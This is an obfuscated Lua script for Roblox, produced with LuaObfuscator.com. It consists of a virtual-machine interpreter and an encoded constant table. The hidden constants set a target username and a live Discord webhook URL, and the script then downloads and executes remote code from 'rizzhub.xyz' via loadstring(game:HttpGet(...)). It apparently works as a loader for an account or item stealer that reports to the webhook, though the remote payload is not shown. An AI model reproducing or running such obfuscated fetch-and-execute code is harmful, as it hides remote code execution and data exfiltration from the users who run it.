--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v76=v5(v68,v19);v19=nil;return v76;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((602 -(374 + 226))^(v32-(4 -3))))%((5 -3)^(((v33-1) -(v32-(1 + 0))) + 1 + 0)) ;return v69-(v69%(1 -(197 -(102 + 95)))) ;else local v70=(246 -(82 + 162))^(v32-((1811 -(1531 + 279)) + 0)) ;return (((v31%(v70 + v70))>=v70) and (952 -(500 + 451))) or ((1929 -(470 + 1411)) -(19 + 29)) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -(1339 -(880 + 459)) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 + 0 ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (1224 -(354 + 866)) ;return (v41 * ((9095698 + 7682660) -(200 + (1183 -(38 + 203))))) + (v40 * (171639 -106103)) + (v39 * (947 -691)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1018 -(77 + 940) ;local v45=(v20(v43,1 -(0 -0) ,20) * (2^(5 + 27))) + v42 ;local v46=v20(v43,21,38 -7 );local v47=((v20(v43,(26 -15) + 21 )==((1 + 0) -0)) and  -(3 -(5 -3))) or 1 ;if (v46==(1101 -(801 + 300))) then if (v45==(0 -0)) then return v47 * (424 -(392 + 32)) ;else local v77=0;while true do if (v77==(0 -0)) then v46=1868 -(1820 + 47) ;v44=(896 -(115 + 781)) -0 ;break;end end end elseif (v46==(171 + 1876)) then return ((v45==(0 + (23 -(13 + 10)))) and (v47 * ((1 + 0)/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-((3049 -(50 + 487)) -(130 + 1359)) ) * (v44 + (v45/((1926 -(789 + 1135))^(116 -(186 -(68 + 54)))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(1556 -(759 + 797))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v66=77 -(55 + 21) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (1~=v51) then else local v71=0;while true do if (v71==(3 -2)) then v51=5 -3 ;break;end if (v71==0) then v54=nil;v55=nil;v71=715 -(375 + 339) ;end end end if (v51~=0) then else v52=0 + 0 ;v53=nil;v51=1;end if (3==v51) then v58=nil;while true do local v78=0 + 0 ;while true do if ((1 -0)==v78) then if (v52==2) then local v95=171 -(78 + 93) ;local v96;while true do if (v95==(1975 -(1388 + 587))) then v96=0 + 0 ;while true do if (v96~=0) then else for v114=1,v23() do local v115=0 -0 ;local v116;local v117;local v118;while true do if (v115~=(1939 -(1200 + 738))) then else v118=nil;while true do if (v116~=1) then else while true do if (v117==(0 -0)) then v118=v21();if (v20(v118,1,1115 -(704 + 410) )==0) then local v158=0 -0 ;local v159;local v160;local v161;local v162;local v163;local v164;while true do if (v158==0) then v159=1727 -(1012 + 715) ;v160=nil;v158=1 + 0 ;end if (v158~=2) then else v163=nil;v164=nil;v158=781 -(244 + 534) ;end if (v158~=(1641 -(1400 + 240))) then else v161=nil;v162=nil;v158=2;end if (v158~=3) then else while true do if (v159==(484 -(186 + 298))) then v160=0;v161=nil;v159=501 -(165 + 335) ;end if (v159~=2) then else v164=nil;while true do if (v160~=(2 + 0)) then else while true do if (v161~=(1031 -(981 + 50))) then else local v185=0;local v186;while true do if (v185~=0) then else v186=0;while true do if (v186==(1 -0)) then v161=1977 -(1308 + 668) ;break;end if (v186==(0 + 0)) then local v198=0;while true do if (v198==(2 -1)) then v186=1321 -(1189 + 131) ;break;end if ((0 + 0)==v198) then v162=v20(v118,1 + 1 ,3);v163=v20(v118,8 -4 ,6);v198=1;end end end end break;end end end if (v161==(4 -1)) then if (v20(v163,3,1 + 2 )==1) then v164[4]=v58[v164[4]];end v53[v114]=v164;break;end if (2==v161) then local v188=0;while true do if (v188==(991 -(143 + 848))) then local v196=0;local v197;while true do if (v196==(0 + 0)) then v197=1058 -(73 + 985) ;while true do if (v197~=0) then else if (v20(v163,1,1)~=(302 -(227 + 74))) then else v164[2]=v58[v164[1 + 1 ]];end if (v20(v163,2,2)~=1) then else v164[3 -0 ]=v58[v164[737 -(26 + 708) ]];end v197=1;end if (v197==(1 -0)) then v188=2 -1 ;break;end end break;end end end if (1==v188) then v161=6 -3 ;break;end end end if (v161~=(988 -(528 + 459))) then else local v189=0 -0 ;local v190;local v191;while true do if (v189~=(0 + 0)) then else v190=0 -0 ;v191=nil;v189=2 -1 ;end if ((1 + 0)~=v189) then else while true do if (v190==0) then v191=0;while true do if (v191==(1731 -(439 + 1292))) then local v199=1583 -(955 + 628) ;while true do if (v199~=0) then else local v204=1562 -(63 + 1499) ;while true do if (v204==1) then v199=1;break;end if ((0 -0)==v204) then v164={v22(),v22(),nil,nil};if (v162==(0 + 0)) then local v205=0 -0 ;local v206;local v207;while true do if (v205==(0 -0)) then v206=0 -0 ;v207=nil;v205=1 -0 ;end if (v205~=1) then else while true do if (v206==(581 -(134 + 447))) then v207=0 -0 ;while true do if (v207==(0 -0)) then v164[3]=v22();v164[4]=v22();break;end end break;end end break;end end elseif (v162==1) then v164[3]=v23();elseif (v162==2) then v164[3]=v23() -(2^16) ;elseif (v162~=(1777 -(763 + 1011))) then else local v210=0;local v211;local v212;local v213;while true do if (v210==1) then v213=nil;while true do if (v211==1) then while true do if (v212~=0) then else v213=0 + 0 ;while true do if (v213~=0) then else v164[9 -6 ]=v23() -((1 + 1)^(26 -10)) ;v164[5 -1 ]=v22();break;end end break;end end break;end if (v211~=0) then else v212=0;v213=nil;v211=1;end end break;end if (v210~=0) then else v211=0 + 0 ;v212=nil;v210=1216 -(702 + 513) ;end end end v204=1 + 0 ;end end end if (v199~=1) then else v191=1;break;end end end if (v191==1) then v161=2;break;end end break;end end break;end end end end break;end if (v160==(1 + 0)) then local v181=0;while true do if ((1 + 0)~=v181) then else v160=2;break;end if (v181~=(0 + 0)) then else v163=nil;v164=nil;v181=1311 -(533 + 777) ;end end end if (v160==(1417 -(1351 + 66))) then local v182=0 -0 ;local v183;while true do if (v182==(0 -0)) then v183=0 -0 ;while true do if (v183~=(0 + 0)) then else v161=0;v162=nil;v183=1;end if (v183==(1826 -(1726 + 99))) then v160=1 + 0 ;break;end end break;end end end end break;end if (v159==1) then local v178=0 -0 ;while true do if (v178==(2 -1)) then v159=2;break;end if (0==v178) then v162=nil;v163=nil;v178=1;end end end end break;end end end break;end end break;end if ((0 -0)~=v116) then else v117=0;v118=nil;v116=1;end end break;end if (v115==0) then v116=1571 -(950 + 621) ;v117=nil;v115=67 -(36 + 30) ;end end end for v119=1294 -(474 + 819) ,v23() do v54[v119-1 ]=v28();end v96=1;end if (v96==(1 -0)) then local v109=0;while true do if (v109~=(0 + 0)) then else for v124=1 + 0 ,v23() do v55[v124]=v23();end return v56;end end end end break;end end end break;end if (v78==0) then if (v52==(0 + 0)) then local v97=1344 -(698 + 646) ;local v98;while true do if (v97==(0 -0)) then v98=196 -(78 + 118) ;while true do if (v98~=(1205 -(765 + 439))) then else v55={};v56={v53,v54,nil,v55};v98=1849 -(1746 + 101) ;end if (v98==(1995 -(189 + 1806))) then local v110=0;while true do if (0==v110) then v53={};v54={};v110=1;end if (v110==(1791 -(171 + 1619))) then v98=411 -(287 + 123) ;break;end end end if (v98~=(16 -(7 + 7))) then else v52=1 + 0 ;break;end end break;end end end if (v52==1) then local v99=0 + 0 ;local v100;while true do if (0~=v99) then else v100=0;while true do if (v100~=0) then else local v111=0;while true do if (v111==(811 -(580 + 231))) then v57=v23();v58={};v111=946 -(188 + 757) ;end if (v111~=1) then else v100=1 + 0 ;break;end end end if (v100==(1 + 1)) then v52=2;break;end if (v100~=(1 + 0)) then else local v112=0;while true do if (v112==(3 -2)) then v100=4 -2 ;break;end if (v112~=0) then else for v126=3 -2 ,v57 do local v127=0;local v128;local v129;local v130;local v131;while true do if (1==v127) then v130=nil;v131=nil;v127=2;end if (v127~=(0 -0)) then else v128=0;v129=nil;v127=1;end if ((1 + 1)~=v127) then else while true do if (v128~=1) then else v131=nil;while true do if (v129~=1) then else if (v130==1) then v131=v21()~=0 ;elseif (v130==2) then v131=v24();elseif (v130==(743 -(307 + 433))) then v131=v25();end v58[v126]=v131;break;end if (v129~=(0 + 0)) then else local v169=0 -0 ;while true do if (v169==(0 + 0)) then v130=v21();v131=nil;v169=1 -0 ;end if (v169~=(2 -1)) then else v129=1 + 0 ;break;end end end end break;end if (v128~=0) then else local v155=0 -0 ;while true do if (v155~=(1 + 0)) then else v128=1;break;end if (v155==(0 -0)) then v129=1605 -(1131 + 474) ;v130=nil;v155=1;end end end end break;end end end v56[3]=v21();v112=1;end end end end break;end end end v78=1;end end end break;end if (v51~=2) then else local v72=0;while true do if (v72~=1) then else v51=3;break;end if (v72~=(0 + 0)) then else v56=nil;v57=nil;v72=1;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==1) then v82={...};v83=v12("#",...) -1 ;v79=2;end if (0==v79) then v80=1;v81= -1;v79=1;end if (v79==2) then v84=nil;function v84()local v85=v63;local v86=v64;local v87=v65;local v88=v27;local v89={};local v90={};local v91={};for v101=178 -(51 + 127) ,v83 do if ((v101>=v87) or ((2333 -1392)<=(54 + 67 + 191))) then v89[v101-v87 ]=v82[v101 + 1 + 0 ];else v91[v101]=v82[v101 + (1323 -(17 + 1305)) ];end end local v92=(v83-v87) + (2 -1) ;local v93;local v94;while true do local v102=0 + 0 + 0 ;local v103;while true do if ((v102==0) or ((634 -338)>((99 -16) + 1986))) then v103=1348 -(994 + 354) ;while true do if ((v103==0) or ((1963 -(19 + 176))>=(1564 + (2448 -1100)))) then local v113=0 + 0 ;while true do if (((3939 + 136)>(1531 + 260)) and (v113==(1 -0))) then v103=1 -0 ;break;end if ((v113==(870 -(51 + 819))) or ((1521 + 886)>=(2017 + 685))) then v93=v85[v80];v94=v93[2 -1 ];v113=4 -(3 + 0) ;end end end if ((v103==((931 -(301 + 629)) + 0)) or (((19850 -14825) -3277)>4396)) then if ((v94<=(17 -13)) or ((1315 -((435 -284) + 223 + 394))>=(14172 -9333))) then if ((v94<=((1135 -(946 + 188)) + 0)) or ((768 + 113 + 2150)<=526)) then if ((v94>(0 + 0)) or ((6899 -3721)>=(587 + 3576))) then v91[v93[2 + 0 ]]=v93[861 -(734 + (661 -(404 + 133))) ];else do return;end end elseif ((v94<=(1666 -(334 + 266 + 1064))) or ((2426 -(81 + 502))>(5812 -3827))) then if (((2681 + (4955 -3125))>((521 -(156 + 327)) + 1861)) and (v91[v93[1321 -(23 + (3259 -(944 + 1019))) ]]==v93[10 -6 ])) then v80=v80 + 1 ;else v80=v93[1708 -(306 + 1399) ];end elseif ((v94>(7 -4)) or (((3419 -(140 + 230)) + 414)<=(1185 + 1258))) then local v138=654 -(596 + 58) ;local v139;local v140;local v141;local v142;while true do if (((19067 -14140)>=(1 + 167)) and ((0 + 0)==v138)) then v139=1231 -(713 + 518) ;v140=nil;v138=(1283 -(916 + 366)) -0 ;end if ((v138==(1616 -(1045 + 570))) or (3071>=(8096 -3265))) then v141=nil;v142=nil;v138=2 -0 ;end if (((618 + 130 + 1503)==((11338 -7151) -(758 + 1178))) and (v138==(1 + 1))) then while true do if (((3179 -(112 + 54))==((1956 -(1359 + 241)) + 2657)) and (v139==(1 + 0))) then v142=nil;while true do if ((v140==0) or ((2719 -1696)>2357)) then local v171=0 -0 ;local v172;while true do if ((v171==(0 -0)) or ((10273 -6580)<=(1899 -675))) then v172=350 -(89 + 261) ;while true do if (((3390 -2209)<=(2608 -(235 + 168 + 623))) and (0==v172)) then local v184=0;while true do if (((1918 -(1486 + 431))==v184) or ((1547 + (3279 -(197 + 1414)))<(2739 -(288 + 984)))) then v172=1 -0 ;break;end if ((4448>=(2118 -(23 + (995 -607)))) and (v184==(0 -(0 -0)))) then v141=v93[2 + 0 ];v142=v91[v93[1396 -((2083 -(867 + 191)) + (2094 -(1402 + 324))) ]];v184=463 -(392 + 70) ;end end end if ((4402>3200) and (v172==(1 + 0))) then v140=(2 -1) + 0 ;break;end end break;end end end if ((v140==1) or ((195 + (1353 -(1027 + 63)))>((4299 + 7106) -7146))) then v91[v141 + (2 -1) ]=v142;v91[v141]=v142[v93[6 -2 ]];break;end end break;end if ((((1263 + 174) -(379 + 406))==(306 + 346)) and (v139==(0 -0))) then v140=0 + (799 -(557 + 242)) ;v141=nil;v139=1 -0 ;end end break;end end else local v143=0 + 0 ;local v144;local v145;local v146;while true do if (((1819 -(915 -404))<=4980) and (v143==1)) then v146=nil;while true do if ((v144==(0 + 0)) or (2366>=((376 + 2652) -(67 + 294)))) then local v170=1196 -(208 + 988) ;while true do if ((v170==(45 -(39 + 5))) or (1204==((2667 -971) + 1255 + 1687))) then v144=1 + 0 + 0 ;break;end if (((1160 + 36 + 472)<(6374 -(35 + 753 + 809))) and ((0 -0)==v170)) then v145=(1313 -(896 + 81)) -((1005 -(271 + 657)) + 259) ;v146=nil;v170=1;end end end if (((4399 -2208)<=((11073 -(76 + 970)) -5872)) and (1==v144)) then while true do if ((v145==((0 -0) + 0)) or ((2316 -(404 + 377))<=377)) then v146=v93[1 + (1095 -(184 + 910)) ];v91[v146]=v91[v146](v13(v91,v146 + (4 -3) ,v81));break;end end break;end end break;end if ((v143==(0 + 0)) or ((2898 + 573)<2666)) then v144=0 -0 ;v145=nil;v143=1;end end end elseif ((v94<=((4 + 6) -3)) or (((7080 -4386) -(32 + 572))<=(726 + 169))) then if (((4776 -(905 + 781))>(1142 + 1552)) and (v94<=(5 + 0))) then v91[v93[5 -3 ]]=v93[7 -4 ]~=0 ;elseif (((1205 + 445)<2594) and (v94>(4 + 2))) then v91[v93[1903 -(1136 + 765) ]]();else v91[v93[(1466 -858) -((976 -674) + 304) ]]=v61[v93[3]];end elseif (((158 + 2899)>((5442 -(1253 + 746)) -(1437 + 190))) and (v94<=(3 + 5))) then v61[v93[3 + 0 ]]=v91[v93[169 -(126 + 41) ]];elseif ((v94==(4 + 5)) or ((829 + 1737)<(609 + 63))) then v80=v93[8 -5 ];else local v150=944 -(179 + 765) ;local v151;local v152;local v153;local v154;while true do if (((4462 -(362 + 755))>=((457 + 76) -((989 -616) + 95))) and (v150==(528 -(216 + 311)))) then local v156=0 -0 ;while true do if (((561 -(276 + (314 -125)))<=(3131 + 33 + 152)) and ((0 -(0 -0))==v156)) then v81=(v153 + v151) -((16 -12) -(1904 -(1696 + 205))) ;v154=0 + 0 ;v156=1684 -(254 + 916 + 254 + 259) ;end if ((v156==((1 -0) -0)) or (948==(1400 + 1394))) then v150=4 -2 ;break;end end end if ((v150==(0 + 0)) or ((3349 + 1020)<=(372 -295))) then v151=v93[500 -(148 + 293 + 57) ];v152,v153=v88(v91[v151](v13(v91,v151 + 1 + 0 ,v93[558 -(372 + 183) ])));v150=1 -0 ;end if ((v150==2) or (((12586 -(1146 + 820)) -6941)==((1201 -(1006 + 57)) + 61))) then for v165=v151,v81 do local v166=1135 -(53 + 1082) ;local v167;while true do if (((8108 -3956)>=1419) and (v166==(0 -(0 + 0)))) then v167=0 + 0 ;while true do if (((2755 -1728)<=((2800 -(524 + 296)) + 1733)) and (v167==(0 -0))) then v154=v154 + (112 -(65 + 46)) ;v91[v165]=v152[v154];break;end end break;end end end break;end end end v80=v80 + 1 ;break;end end break;end end end end v79=3;end if (v79==3) then A,B=v27(v11(v84));if  not A[1] then local v104=v59[4][v80] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756103083O00557365724E616D65030C3O004F756B694E6F74466F756E6403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039352O36373839303235313839383931302F5958674F50534B746B5655442O56474541797261485144706D4D625A6B3730664F776D724F78633438562D565355663548654F3458563779426C664671485F6A48794F4400153O0012013O00013O0026023O000C000100020004093O000C0001001206000100033O001206000200043O002004000200020005001201000400064O0005000500014O000A000200054O000300013O00022O00070001000100010004093O001400010026023O0001000100010004093O00010001001201000100083O001208000100073O0012010001000A3O001208000100093O0012013O00023O0004093O000100016O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
